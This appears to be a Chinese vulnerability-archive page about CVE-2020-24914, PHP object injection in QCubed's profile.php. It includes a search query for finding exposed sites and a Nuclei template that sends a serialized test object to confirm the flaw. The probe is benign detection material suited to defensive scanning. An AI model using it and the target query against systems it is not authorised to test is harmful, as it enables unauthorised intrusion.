QCubed PHP Object Injection Vulnerability

漏洞信息

漏洞名称: QCubed PHP Object Injection Vulnerability

漏洞编号:

  • CVE: CVE-2020-24914

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: QCubed是一个PHP框架,用于快速开发数据库驱动的Web应用程序。它广泛应用于各种Web开发项目中,特别是那些需要快速原型设计和开发的场景。该框架的典型部署场景包括企业级服务和常见的Web应用组件。

该漏洞属于反序列化类型,技术根源在于profile.php中未对用户提供的POST数据进行适当的验证和过滤,直接进行了反序列化操作。这使得攻击者可以通过构造恶意的POST请求,注入特定的序列化对象,进而在服务器上执行任意代码。

此漏洞的安全风险极高,因为它允许未经认证的攻击者远程执行代码,可能导致服务器被完全控制,数据泄露,或服务中断。由于攻击不需要任何形式的认证,且可以自动化执行,因此对使用受影响版本QCubed框架的网站构成了严重威胁。

产品厂商: QCubed

产品名称: QCubed

影响版本: 3.1.1 and all versions

搜索语法: title=”QCubed” || body=”qcubed”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/02939a596df6ed5c7e8388c39de4f32d1d5ab2b8/http%2Fvulnerabilities%2Fphp%2Fqcubed-php-object-injection.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

id: qcubed-php-object-injection

info:
  name: QCubed PHP Object Injection (CVE-2020-24914)
  author: pranjal
  severity: critical
  description: |
    QCubed 3.1.1 and all versions contain a PHP object injection caused by unserializing untrusted POST data in profile.php,
    letting unauthenticated attackers execute arbitrary code via crafted POST requests.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24914
    - http://seclists.org/fulldisclosure/2021/Mar/28
    - https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
    - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-01
  classification:
    cwe-id: CWE-502
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 2
    product: QCubed
    fofa-query: title="QCubed" || body="qcubed"
  tags: cve,cve2020,qcubed,php,object-injection,rce,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "qcubed") || contains(tolower(body), "qform")'
        condition: and
        internal: true

  - raw:
      - |
        POST /profile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        data=O:8:"stdClass":1:{s:4:"test";s:10:"{{randstr}}";}&action=save&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "stdClass"
          - "{{randstr}}"

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - 'contains(body, "stdClass")'
          - 'contains(body, "{{randstr}}")'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'O:8:"stdClass":1:\{s:4:"test";s:\d+:"[^"]+";\}'
        internal: true

Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
QCubed PHP Object Injection Vulnerability
http://example.com/2025/07/17/github_844445029/
作者
lianccc
发布于
2025年7月17日
许可协议